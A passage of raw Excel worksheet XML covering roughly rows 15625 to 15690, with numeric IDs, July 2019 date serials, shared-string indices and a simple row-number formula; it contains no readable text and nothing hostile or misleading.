      <c r="D15625" s="1">
        <v>43676</v>
      </c>
      <c r="F15625" t="s">
        <v>9975</v>
      </c>
      <c r="G15625" t="s">
        <v>26340</v>
      </c>
    </row>
    <row r="15626" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15626">
        <f t="shared" si="244"/>
        <v>15625</v>
      </c>
      <c r="B15626">
        <v>625</v>
      </c>
      <c r="C15626" t="s">
        <v>25497</v>
      </c>
      <c r="D15626" s="1">
        <v>43676</v>
      </c>
      <c r="F15626" t="s">
        <v>9975</v>
      </c>
      <c r="G15626" t="s">
        <v>26341</v>
      </c>
    </row>
    <row r="15627" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15627">
        <f t="shared" si="244"/>
        <v>15626</v>
      </c>
      <c r="B15627">
        <v>626</v>
      </c>
      <c r="C15627" t="s">
        <v>25497</v>
      </c>
      <c r="D15627" s="1">
        <v>43676</v>
      </c>
      <c r="F15627" t="s">
        <v>9975</v>
      </c>
      <c r="G15627" t="s">
        <v>26342</v>
      </c>
    </row>
    <row r="15628" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15628">
        <f t="shared" si="244"/>
        <v>15627</v>
      </c>
      <c r="B15628">
        <v>627</v>
      </c>
      <c r="C15628" t="s">
        <v>25497</v>
      </c>
      <c r="D15628" s="1">
        <v>43668</v>
      </c>
      <c r="F15628" t="s">
        <v>9975</v>
      </c>
      <c r="G15628" t="s">
        <v>26343</v>
      </c>
    </row>
    <row r="15629" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15629">
        <f t="shared" si="244"/>
        <v>15628</v>
      </c>
      <c r="B15629">
        <v>628</v>
      </c>
      <c r="C15629" t="s">
        <v>25497</v>
      </c>
      <c r="D15629" s="1">
        <v>43668</v>
      </c>
      <c r="E15629" t="s">
        <v>25512</v>
      </c>
      <c r="F15629" t="s">
        <v>9975</v>
      </c>
      <c r="G15629" t="s">
        <v>26344</v>
      </c>
    </row>
    <row r="15630" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15630">
        <f t="shared" si="244"/>
        <v>15629</v>
      </c>
      <c r="B15630">
        <v>629</v>
      </c>
      <c r="C15630" t="s">
        <v>25497</v>
      </c>
      <c r="D15630" s="1">
        <v>43675</v>
      </c>
      <c r="F15630" t="s">
        <v>9975</v>
      </c>
      <c r="G15630" t="s">
        <v>26345</v>
      </c>
    </row>
    <row r="15631" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15631">
        <f t="shared" si="244"/>
        <v>15630</v>
      </c>
      <c r="B15631">
        <v>630</v>
      </c>
      <c r="C15631" t="s">
        <v>25497</v>
      </c>
      <c r="D15631" s="1">
        <v>43670</v>
      </c>
      <c r="F15631" t="s">
        <v>9975</v>
      </c>
      <c r="G15631" t="s">
        <v>26346</v>
      </c>
    </row>
    <row r="15632" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15632">
        <f t="shared" si="244"/>
        <v>15631</v>
      </c>
      <c r="B15632">
        <v>631</v>
      </c>
      <c r="C15632" t="s">
        <v>25497</v>
      </c>
      <c r="D15632" s="1">
        <v>43672</v>
      </c>
      <c r="F15632" t="s">
        <v>9975</v>
      </c>
      <c r="G15632" t="s">
        <v>26347</v>
      </c>
    </row>
    <row r="15633" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15633">
        <f t="shared" si="244"/>
        <v>15632</v>
      </c>
      <c r="B15633">
        <v>632</v>
      </c>
      <c r="C15633" t="s">
        <v>25497</v>
      </c>
      <c r="D15633" s="1">
        <v>43675</v>
      </c>
      <c r="E15633" t="s">
        <v>25517</v>
      </c>
      <c r="F15633" t="s">
        <v>9975</v>
      </c>
      <c r="G15633" t="s">
        <v>26348</v>
      </c>
    </row>
    <row r="15634" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15634">
        <f t="shared" si="244"/>
        <v>15633</v>
      </c>
      <c r="B15634">
        <v>633</v>
      </c>
      <c r="C15634" t="s">
        <v>25497</v>
      </c>
      <c r="D15634" s="1">
        <v>43675</v>
      </c>
      <c r="F15634" t="s">
        <v>9975</v>
      </c>
      <c r="G15634" t="s">
        <v>26349</v>
      </c>
    </row>
    <row r="15635" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15635">
        <f t="shared" si="244"/>
        <v>15634</v>
      </c>
      <c r="B15635">
        <v>634</v>
      </c>
      <c r="C15635" t="s">
        <v>25497</v>
      </c>
      <c r="D15635" s="1">
        <v>43675</v>
      </c>
      <c r="E15635" t="s">
        <v>26350</v>
      </c>
      <c r="F15635" t="s">
        <v>9975</v>
      </c>
      <c r="G15635" t="s">
        <v>26351</v>
      </c>
    </row>
    <row r="15636" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15636">
        <f t="shared" si="244"/>
        <v>15635</v>
      </c>
      <c r="B15636">
        <v>635</v>
      </c>
      <c r="C15636" t="s">
        <v>25497</v>
      </c>
      <c r="D15636" s="1">
        <v>43677</v>
      </c>
      <c r="F15636" t="s">
        <v>9975</v>
      </c>
      <c r="G15636" t="s">
        <v>26352</v>
      </c>
    </row>
    <row r="15637" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15637">
        <f t="shared" si="244"/>
        <v>15636</v>
      </c>
      <c r="B15637">
        <v>636</v>
      </c>
      <c r="C15637" t="s">
        <v>25497</v>
      </c>
      <c r="D15637" s="1">
        <v>43671</v>
      </c>
      <c r="E15637" t="s">
        <v>25584</v>
      </c>
      <c r="F15637" t="s">
        <v>9975</v>
      </c>
      <c r="G15637" t="s">
        <v>26353</v>
      </c>
    </row>
    <row r="15638" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15638">
        <f t="shared" si="244"/>
        <v>15637</v>
      </c>
      <c r="B15638">
        <v>637</v>
      </c>
      <c r="C15638" t="s">
        <v>25497</v>
      </c>
      <c r="D15638" s="1">
        <v>43676</v>
      </c>
      <c r="F15638" t="s">
        <v>9975</v>
      </c>
      <c r="G15638" t="s">
        <v>26354</v>
      </c>
    </row>
    <row r="15639" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15639">
        <f t="shared" si="244"/>
        <v>15638</v>
      </c>
      <c r="B15639">
        <v>638</v>
      </c>
      <c r="C15639" t="s">
        <v>25497</v>
      </c>
      <c r="D15639" s="1">
        <v>43670</v>
      </c>
      <c r="E15639" t="s">
        <v>25609</v>
      </c>
      <c r="F15639" t="s">
        <v>9975</v>
      </c>
      <c r="G15639" t="s">
        <v>26355</v>
      </c>
    </row>
    <row r="15640" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15640">
        <f t="shared" si="244"/>
        <v>15639</v>
      </c>
      <c r="B15640">
        <v>639</v>
      </c>
      <c r="C15640" t="s">
        <v>25497</v>
      </c>
      <c r="D15640" s="1">
        <v>43672</v>
      </c>
      <c r="F15640" t="s">
        <v>9975</v>
      </c>
      <c r="G15640" t="s">
        <v>26356</v>
      </c>
    </row>
    <row r="15641" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15641">
        <f t="shared" si="244"/>
        <v>15640</v>
      </c>
      <c r="B15641">
        <v>640</v>
      </c>
      <c r="C15641" t="s">
        <v>25497</v>
      </c>
      <c r="D15641" s="1">
        <v>43671</v>
      </c>
      <c r="F15641" t="s">
        <v>10526</v>
      </c>
      <c r="G15641" t="s">
        <v>26357</v>
      </c>
    </row>
    <row r="15642" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15642">
        <f t="shared" si="244"/>
        <v>15641</v>
      </c>
      <c r="B15642">
        <v>641</v>
      </c>
      <c r="C15642" t="s">
        <v>25497</v>
      </c>
      <c r="D15642" s="1">
        <v>43668</v>
      </c>
      <c r="F15642" t="s">
        <v>9975</v>
      </c>
      <c r="G15642" t="s">
        <v>26358</v>
      </c>
    </row>
    <row r="15643" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15643">
        <f t="shared" si="244"/>
        <v>15642</v>
      </c>
      <c r="B15643">
        <v>642</v>
      </c>
      <c r="C15643" t="s">
        <v>25497</v>
      </c>
      <c r="D15643" s="1">
        <v>43676</v>
      </c>
      <c r="E15643" t="s">
        <v>19705</v>
      </c>
      <c r="F15643" t="s">
        <v>9975</v>
      </c>
      <c r="G15643" t="s">
        <v>26359</v>
      </c>
    </row>
    <row r="15644" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15644">
        <f t="shared" si="244"/>
        <v>15643</v>
      </c>
      <c r="B15644">
        <v>643</v>
      </c>
      <c r="C15644" t="s">
        <v>25497</v>
      </c>
      <c r="D15644" s="1">
        <v>43676</v>
      </c>
      <c r="E15644" t="s">
        <v>25509</v>
      </c>
      <c r="F15644" t="s">
        <v>10021</v>
      </c>
      <c r="G15644" t="s">
        <v>26360</v>
      </c>
    </row>
    <row r="15645" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15645">
        <f t="shared" si="244"/>
        <v>15644</v>
      </c>
      <c r="B15645">
        <v>644</v>
      </c>
      <c r="C15645" t="s">
        <v>25497</v>
      </c>
      <c r="D15645" s="1">
        <v>43675</v>
      </c>
      <c r="F15645" t="s">
        <v>9975</v>
      </c>
      <c r="G15645" t="s">
        <v>26361</v>
      </c>
    </row>
    <row r="15646" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15646">
        <f t="shared" si="244"/>
        <v>15645</v>
      </c>
      <c r="B15646">
        <v>645</v>
      </c>
      <c r="C15646" t="s">
        <v>25497</v>
      </c>
      <c r="D15646" s="1">
        <v>43675</v>
      </c>
      <c r="F15646" t="s">
        <v>9975</v>
      </c>
      <c r="G15646" t="s">
        <v>26362</v>
      </c>
    </row>
    <row r="15647" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15647">
        <f t="shared" si="244"/>
        <v>15646</v>
      </c>
      <c r="B15647">
        <v>646</v>
      </c>
      <c r="C15647" t="s">
        <v>25497</v>
      </c>
      <c r="D15647" s="1">
        <v>43672</v>
      </c>
      <c r="F15647" t="s">
        <v>9975</v>
      </c>
      <c r="G15647" t="s">
        <v>26363</v>
      </c>
    </row>
    <row r="15648" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15648">
        <f t="shared" si="244"/>
        <v>15647</v>
      </c>
      <c r="B15648">
        <v>647</v>
      </c>
      <c r="C15648" t="s">
        <v>25497</v>
      </c>
      <c r="D15648" s="1">
        <v>43675</v>
      </c>
      <c r="F15648" t="s">
        <v>9975</v>
      </c>
      <c r="G15648" t="s">
        <v>26364</v>
      </c>
    </row>
    <row r="15649" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15649">
        <f t="shared" si="244"/>
        <v>15648</v>
      </c>
      <c r="B15649">
        <v>648</v>
      </c>
      <c r="C15649" t="s">
        <v>25497</v>
      </c>
      <c r="D15649" s="1">
        <v>43669</v>
      </c>
      <c r="E15649" t="s">
        <v>25592</v>
      </c>
      <c r="F15649" t="s">
        <v>9975</v>
      </c>
      <c r="G15649" t="s">
        <v>26365</v>
      </c>
    </row>
    <row r="15650" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15650">
        <f t="shared" si="244"/>
        <v>15649</v>
      </c>
      <c r="B15650">
        <v>649</v>
      </c>
      <c r="C15650" t="s">
        <v>25497</v>
      </c>
      <c r="D15650" s="1">
        <v>43668</v>
      </c>
      <c r="F15650" t="s">
        <v>10021</v>
      </c>
      <c r="G15650" t="s">
        <v>26366</v>
      </c>
    </row>
    <row r="15651" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15651">
        <f t="shared" si="244"/>
        <v>15650</v>
      </c>
      <c r="B15651">
        <v>650</v>
      </c>
      <c r="C15651" t="s">
        <v>25497</v>
      </c>
      <c r="D15651" s="1">
        <v>43676</v>
      </c>
      <c r="F15651" t="s">
        <v>9975</v>
      </c>
      <c r="G15651" t="s">
        <v>26367</v>
      </c>
    </row>
    <row r="15652" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15652">
        <f t="shared" si="244"/>
        <v>15651</v>
      </c>
      <c r="B15652">
        <v>651</v>
      </c>
      <c r="C15652" t="s">
        <v>25497</v>
      </c>
      <c r="D15652" s="1">
        <v>43668</v>
      </c>
      <c r="E15652" t="s">
        <v>25504</v>
      </c>
      <c r="F15652" t="s">
        <v>9975</v>
      </c>
      <c r="G15652" t="s">
        <v>26368</v>
      </c>
    </row>
    <row r="15653" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15653">
        <f t="shared" si="244"/>
        <v>15652</v>
      </c>
      <c r="B15653">
        <v>652</v>
      </c>
      <c r="C15653" t="s">
        <v>25497</v>
      </c>
      <c r="D15653" s="1">
        <v>43676</v>
      </c>
      <c r="F15653" t="s">
        <v>9975</v>
      </c>
      <c r="G15653" t="s">
        <v>26369</v>
      </c>
    </row>
    <row r="15654" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15654">
        <f t="shared" si="244"/>
        <v>15653</v>
      </c>
      <c r="B15654">
        <v>653</v>
      </c>
      <c r="C15654" t="s">
        <v>25497</v>
      </c>
      <c r="D15654" s="1">
        <v>43672</v>
      </c>
      <c r="F15654" t="s">
        <v>9975</v>
      </c>
      <c r="G15654" t="s">
        <v>26370</v>
      </c>
    </row>
    <row r="15655" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15655">
        <f t="shared" si="244"/>
        <v>15654</v>
      </c>
      <c r="B15655">
        <v>654</v>
      </c>
      <c r="C15655" t="s">
        <v>25497</v>
      </c>
      <c r="D15655" s="1">
        <v>43675</v>
      </c>
      <c r="F15655" t="s">
        <v>9975</v>
      </c>
      <c r="G15655" t="s">
        <v>26371</v>
      </c>
    </row>
    <row r="15656" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15656">
        <f t="shared" si="244"/>
        <v>15655</v>
      </c>
      <c r="B15656">
        <v>655</v>
      </c>
      <c r="C15656" t="s">
        <v>25497</v>
      </c>
      <c r="D15656" s="1">
        <v>43674</v>
      </c>
      <c r="E15656" t="s">
        <v>26372</v>
      </c>
      <c r="F15656" t="s">
        <v>9975</v>
      </c>
      <c r="G15656" t="s">
        <v>26373</v>
      </c>
    </row>
    <row r="15657" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15657">
        <f t="shared" si="244"/>
        <v>15656</v>
      </c>
      <c r="B15657">
        <v>656</v>
      </c>
      <c r="C15657" t="s">
        <v>25497</v>
      </c>
      <c r="D15657" s="1">
        <v>43670</v>
      </c>
      <c r="E15657" t="s">
        <v>26374</v>
      </c>
      <c r="F15657" t="s">
        <v>9975</v>
      </c>
      <c r="G15657" t="s">
        <v>26375</v>
      </c>
    </row>
    <row r="15658" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15658">
        <f t="shared" si="244"/>
        <v>15657</v>
      </c>
      <c r="B15658">
        <v>657</v>
      </c>
      <c r="C15658" t="s">
        <v>25497</v>
      </c>
      <c r="D15658" s="1">
        <v>43671</v>
      </c>
      <c r="F15658" t="s">
        <v>9975</v>
      </c>
      <c r="G15658" t="s">
        <v>26376</v>
      </c>
    </row>
    <row r="15659" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15659">
        <f t="shared" si="244"/>
        <v>15658</v>
      </c>
      <c r="B15659">
        <v>658</v>
      </c>
      <c r="C15659" t="s">
        <v>25497</v>
      </c>
      <c r="D15659" s="1">
        <v>43672</v>
      </c>
      <c r="F15659" t="s">
        <v>9975</v>
      </c>
      <c r="G15659" t="s">
        <v>26377</v>
      </c>
    </row>
    <row r="15660" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15660">
        <f t="shared" si="244"/>
        <v>15659</v>
      </c>
      <c r="B15660">
        <v>659</v>
      </c>
      <c r="C15660" t="s">
        <v>25497</v>
      </c>
      <c r="D15660" s="1">
        <v>43671</v>
      </c>
      <c r="F15660" t="s">
        <v>10021</v>
      </c>
      <c r="G15660" t="s">
        <v>26378</v>
      </c>
    </row>
    <row r="15661" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15661">
        <f t="shared" si="244"/>
        <v>15660</v>
      </c>
      <c r="B15661">
        <v>660</v>
      </c>
      <c r="C15661" t="s">
        <v>25497</v>
      </c>
      <c r="D15661" s="1">
        <v>43672</v>
      </c>
      <c r="E15661" t="s">
        <v>25614</v>
      </c>
      <c r="F15661" t="s">
        <v>9978</v>
      </c>
      <c r="G15661" t="s">
        <v>26379</v>
      </c>
    </row>
    <row r="15662" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15662">
        <f t="shared" si="244"/>
        <v>15661</v>
      </c>
      <c r="B15662">
        <v>661</v>
      </c>
      <c r="C15662" t="s">
        <v>25497</v>
      </c>
      <c r="D15662" s="1">
        <v>43672</v>
      </c>
      <c r="F15662" t="s">
        <v>9978</v>
      </c>
      <c r="G15662" t="s">
        <v>26380</v>
      </c>
    </row>
    <row r="15663" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15663">
        <f t="shared" si="244"/>
        <v>15662</v>
      </c>
      <c r="B15663">
        <v>662</v>
      </c>
      <c r="C15663" t="s">
        <v>25497</v>
      </c>
      <c r="D15663" s="1">
        <v>43677</v>
      </c>
      <c r="E15663" t="s">
        <v>26142</v>
      </c>
      <c r="F15663" t="s">
        <v>9975</v>
      </c>
      <c r="G15663" t="s">
        <v>26381</v>
      </c>
    </row>
    <row r="15664" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15664">
        <f t="shared" si="244"/>
        <v>15663</v>
      </c>
      <c r="B15664">
        <v>663</v>
      </c>
      <c r="C15664" t="s">
        <v>25497</v>
      </c>
      <c r="D15664" s="1">
        <v>43677</v>
      </c>
      <c r="F15664" t="s">
        <v>9975</v>
      </c>
      <c r="G15664" t="s">
        <v>26382</v>
      </c>
    </row>
    <row r="15665" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15665">
        <f t="shared" si="244"/>
        <v>15664</v>
      </c>
      <c r="B15665">
        <v>664</v>
      </c>
      <c r="C15665" t="s">
        <v>25497</v>
      </c>
      <c r="D15665" s="1">
        <v>43669</v>
      </c>
      <c r="E15665" t="s">
        <v>26383</v>
      </c>
      <c r="F15665" t="s">
        <v>9978</v>
      </c>
      <c r="G15665" t="s">
        <v>26384</v>
      </c>
    </row>
    <row r="15666" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15666">
        <f t="shared" si="244"/>
        <v>15665</v>
      </c>
      <c r="B15666">
        <v>665</v>
      </c>
      <c r="C15666" t="s">
        <v>25497</v>
      </c>
      <c r="D15666" s="1">
        <v>43677</v>
      </c>
      <c r="F15666" t="s">
        <v>9975</v>
      </c>
      <c r="G15666" t="s">
        <v>26385</v>
      </c>
    </row>
    <row r="15667" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15667">
        <f t="shared" si="244"/>
        <v>15666</v>
      </c>
      <c r="B15667">
        <v>666</v>
      </c>
      <c r="C15667" t="s">
        <v>25497</v>
      </c>
      <c r="D15667" s="1">
        <v>43677</v>
      </c>
      <c r="E15667" t="s">
        <v>26386</v>
      </c>
      <c r="F15667" t="s">
        <v>10021</v>
      </c>
      <c r="G15667" t="s">
        <v>26387</v>
      </c>
    </row>
    <row r="15668" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15668">
        <f t="shared" si="244"/>
        <v>15667</v>
      </c>
      <c r="B15668">
        <v>667</v>
      </c>
      <c r="C15668" t="s">
        <v>25497</v>
      </c>
      <c r="D15668" s="1">
        <v>43677</v>
      </c>
      <c r="E15668" t="s">
        <v>26388</v>
      </c>
      <c r="F15668" t="s">
        <v>9975</v>
      </c>
      <c r="G15668" t="s">
        <v>26389</v>
      </c>
    </row>
    <row r="15669" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15669">
        <f t="shared" si="244"/>
        <v>15668</v>
      </c>
      <c r="B15669">
        <v>668</v>
      </c>
      <c r="C15669" t="s">
        <v>25497</v>
      </c>
      <c r="D15669" s="1">
        <v>43668</v>
      </c>
      <c r="E15669" t="s">
        <v>25881</v>
      </c>
      <c r="F15669" t="s">
        <v>9975</v>
      </c>
      <c r="G15669" t="s">
        <v>26390</v>
      </c>
    </row>
    <row r="15670" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15670">
        <f t="shared" si="244"/>
        <v>15669</v>
      </c>
      <c r="B15670">
        <v>669</v>
      </c>
      <c r="C15670" t="s">
        <v>25497</v>
      </c>
      <c r="D15670" s="1">
        <v>43672</v>
      </c>
      <c r="E15670" t="s">
        <v>25723</v>
      </c>
      <c r="F15670" t="s">
        <v>9975</v>
      </c>
      <c r="G15670" t="s">
        <v>26391</v>
      </c>
    </row>
    <row r="15671" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15671">
        <f t="shared" si="244"/>
        <v>15670</v>
      </c>
      <c r="B15671">
        <v>670</v>
      </c>
      <c r="C15671" t="s">
        <v>25497</v>
      </c>
      <c r="D15671" s="1">
        <v>43677</v>
      </c>
      <c r="E15671" t="s">
        <v>26392</v>
      </c>
      <c r="F15671" t="s">
        <v>9975</v>
      </c>
      <c r="G15671" t="s">
        <v>26393</v>
      </c>
    </row>
    <row r="15672" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15672">
        <f t="shared" si="244"/>
        <v>15671</v>
      </c>
      <c r="B15672">
        <v>671</v>
      </c>
      <c r="C15672" t="s">
        <v>25497</v>
      </c>
      <c r="D15672" s="1">
        <v>43676</v>
      </c>
      <c r="E15672" t="s">
        <v>25517</v>
      </c>
      <c r="F15672" t="s">
        <v>9975</v>
      </c>
      <c r="G15672" t="s">
        <v>26394</v>
      </c>
    </row>
    <row r="15673" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15673">
        <f t="shared" si="244"/>
        <v>15672</v>
      </c>
      <c r="B15673">
        <v>672</v>
      </c>
      <c r="C15673" t="s">
        <v>25497</v>
      </c>
      <c r="D15673" s="1">
        <v>43668</v>
      </c>
      <c r="E15673" t="s">
        <v>26395</v>
      </c>
      <c r="F15673" t="s">
        <v>9975</v>
      </c>
      <c r="G15673" t="s">
        <v>26396</v>
      </c>
    </row>
    <row r="15674" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15674">
        <f t="shared" si="244"/>
        <v>15673</v>
      </c>
      <c r="B15674">
        <v>673</v>
      </c>
      <c r="C15674" t="s">
        <v>25497</v>
      </c>
      <c r="D15674" s="1">
        <v>43674</v>
      </c>
      <c r="F15674" t="s">
        <v>9975</v>
      </c>
      <c r="G15674" t="s">
        <v>26397</v>
      </c>
    </row>
    <row r="15675" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15675">
        <f t="shared" si="244"/>
        <v>15674</v>
      </c>
      <c r="B15675">
        <v>674</v>
      </c>
      <c r="C15675" t="s">
        <v>25497</v>
      </c>
      <c r="D15675" s="1">
        <v>43675</v>
      </c>
      <c r="E15675" t="s">
        <v>26398</v>
      </c>
      <c r="F15675" t="s">
        <v>9975</v>
      </c>
      <c r="G15675" t="s">
        <v>26399</v>
      </c>
    </row>
    <row r="15676" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15676">
        <f t="shared" si="244"/>
        <v>15675</v>
      </c>
      <c r="B15676">
        <v>675</v>
      </c>
      <c r="C15676" t="s">
        <v>25497</v>
      </c>
      <c r="D15676" s="1">
        <v>43675</v>
      </c>
      <c r="E15676" t="s">
        <v>26400</v>
      </c>
      <c r="F15676" t="s">
        <v>9975</v>
      </c>
      <c r="G15676" t="s">
        <v>26401</v>
      </c>
    </row>
    <row r="15677" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15677">
        <f t="shared" si="244"/>
        <v>15676</v>
      </c>
      <c r="B15677">
        <v>676</v>
      </c>
      <c r="C15677" t="s">
        <v>25497</v>
      </c>
      <c r="D15677" s="1">
        <v>43671</v>
      </c>
      <c r="E15677" t="s">
        <v>26402</v>
      </c>
      <c r="F15677" t="s">
        <v>9975</v>
      </c>
      <c r="G15677" t="s">
        <v>26403</v>
      </c>
    </row>
    <row r="15678" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15678">
        <f t="shared" si="244"/>
        <v>15677</v>
      </c>
      <c r="B15678">
        <v>677</v>
      </c>
      <c r="C15678" t="s">
        <v>25497</v>
      </c>
      <c r="D15678" s="1">
        <v>43672</v>
      </c>
      <c r="F15678" t="s">
        <v>10021</v>
      </c>
      <c r="G15678" t="s">
        <v>26404</v>
      </c>
    </row>
    <row r="15679" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15679">
        <f t="shared" si="244"/>
        <v>15678</v>
      </c>
      <c r="B15679">
        <v>678</v>
      </c>
      <c r="C15679" t="s">
        <v>25497</v>
      </c>
      <c r="D15679" s="1">
        <v>43677</v>
      </c>
      <c r="E15679" t="s">
        <v>25512</v>
      </c>
      <c r="F15679" t="s">
        <v>9975</v>
      </c>
      <c r="G15679" t="s">
        <v>26405</v>
      </c>
    </row>
    <row r="15680" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15680">
        <f t="shared" si="244"/>
        <v>15679</v>
      </c>
      <c r="B15680">
        <v>679</v>
      </c>
      <c r="C15680" t="s">
        <v>25497</v>
      </c>
      <c r="D15680" s="1">
        <v>43670</v>
      </c>
      <c r="E15680" t="s">
        <v>19705</v>
      </c>
      <c r="F15680" t="s">
        <v>9975</v>
      </c>
      <c r="G15680" t="s">
        <v>26317</v>
      </c>
    </row>
    <row r="15681" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15681">
        <f t="shared" si="244"/>
        <v>15680</v>
      </c>
      <c r="B15681">
        <v>680</v>
      </c>
      <c r="C15681" t="s">
        <v>25497</v>
      </c>
      <c r="D15681" s="1">
        <v>43676</v>
      </c>
      <c r="F15681" t="s">
        <v>9975</v>
      </c>
      <c r="G15681" t="s">
        <v>26406</v>
      </c>
    </row>
    <row r="15682" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15682">
        <f t="shared" si="244"/>
        <v>15681</v>
      </c>
      <c r="B15682">
        <v>681</v>
      </c>
      <c r="C15682" t="s">
        <v>25497</v>
      </c>
      <c r="D15682" s="1">
        <v>43668</v>
      </c>
      <c r="E15682" t="s">
        <v>25774</v>
      </c>
      <c r="F15682" t="s">
        <v>9975</v>
      </c>
      <c r="G15682" t="s">
        <v>26407</v>
      </c>
    </row>
    <row r="15683" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15683">
        <f t="shared" ref="A15683:A15746" si="245">+ROW(A15682)</f>
        <v>15682</v>
      </c>
      <c r="B15683">
        <v>682</v>
      </c>
      <c r="C15683" t="s">
        <v>25497</v>
      </c>
      <c r="D15683" s="1">
        <v>43670</v>
      </c>
      <c r="E15683" t="s">
        <v>26408</v>
      </c>
      <c r="F15683" t="s">
        <v>9975</v>
      </c>
      <c r="G15683" t="s">
        <v>26409</v>
      </c>
    </row>
    <row r="15684" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15684">
        <f t="shared" si="245"/>
        <v>15683</v>
      </c>
      <c r="B15684">
        <v>683</v>
      </c>
      <c r="C15684" t="s">
        <v>25497</v>
      </c>
      <c r="D15684" s="1">
        <v>43675</v>
      </c>
      <c r="E15684" t="s">
        <v>26410</v>
      </c>
      <c r="F15684" t="s">
        <v>9978</v>
      </c>
      <c r="G15684" t="s">
        <v>26411</v>
      </c>
    </row>
    <row r="15685" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15685">
        <f t="shared" si="245"/>
        <v>15684</v>
      </c>
      <c r="B15685">
        <v>684</v>
      </c>
      <c r="C15685" t="s">
        <v>25497</v>
      </c>
      <c r="D15685" s="1">
        <v>43670</v>
      </c>
      <c r="E15685" t="s">
        <v>25609</v>
      </c>
      <c r="F15685" t="s">
        <v>9975</v>
      </c>
      <c r="G15685" t="s">
        <v>26412</v>
      </c>
    </row>
    <row r="15686" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15686">
        <f t="shared" si="245"/>
        <v>15685</v>
      </c>
      <c r="B15686">
        <v>685</v>
      </c>
      <c r="C15686" t="s">
        <v>25497</v>
      </c>
      <c r="D15686" s="1">
        <v>43668</v>
      </c>
      <c r="E15686" t="s">
        <v>25512</v>
      </c>
      <c r="F15686" t="s">
        <v>9975</v>
      </c>
      <c r="G15686" t="s">
        <v>26413</v>
      </c>
    </row>
    <row r="15687" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15687">
        <f t="shared" si="245"/>
        <v>15686</v>
      </c>
      <c r="B15687">
        <v>686</v>
      </c>
      <c r="C15687" t="s">
        <v>25497</v>
      </c>
      <c r="D15687" s="1">
        <v>43671</v>
      </c>
      <c r="E15687" t="s">
        <v>26414</v>
      </c>
      <c r="F15687" t="s">
        <v>9975</v>
      </c>
      <c r="G15687" t="s">
        <v>26415</v>
      </c>
    </row>
    <row r="15688" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15688">
        <f t="shared" si="245"/>
        <v>15687</v>
      </c>
      <c r="B15688">
        <v>687</v>
      </c>
      <c r="C15688" t="s">
        <v>25497</v>
      </c>
      <c r="D15688" s="1">
        <v>43676</v>
      </c>
      <c r="E15688" t="s">
        <v>26416</v>
      </c>
      <c r="F15688" t="s">
        <v>9975</v>
      </c>
      <c r="G15688" t="s">
        <v>26417</v>
      </c>
    </row>
    <row r="15689" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15689">
        <f t="shared" si="245"/>
        <v>15688</v>
      </c>
      <c r="B15689">
        <v>688</v>
      </c>
      <c r="C15689" t="s">
        <v>25497</v>
      </c>
      <c r="D15689" s="1">
        <v>43674</v>
      </c>
      <c r="F15689" t="s">
        <v>10021</v>
      </c>
      <c r="G15689" t="s">
        <v>26418</v>
      </c>
    </row>
    <row r="15690" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15690">
        <f t="shared" si="245"/>
        <v>15689</v>
      </c>
      <c r="B15690">
        <v>689</v>
      </c>
